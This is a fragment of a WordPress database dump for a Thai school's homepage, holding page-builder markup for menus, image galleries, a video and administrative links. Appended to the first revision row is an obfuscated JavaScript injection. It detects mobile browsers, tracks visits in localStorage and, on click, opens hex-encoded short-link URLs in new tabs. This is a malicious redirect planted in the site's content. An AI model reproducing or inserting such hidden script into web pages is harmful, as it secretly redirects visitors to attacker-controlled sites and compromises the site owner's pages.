|\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 18:55:32','2024-07-29 11:55:32','',19,'http://watprato.ssk.in.th/?p=132',0,'revision','',0),
(133,1,'2024-07-29 18:55:42','2024-07-29 11:55:42','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 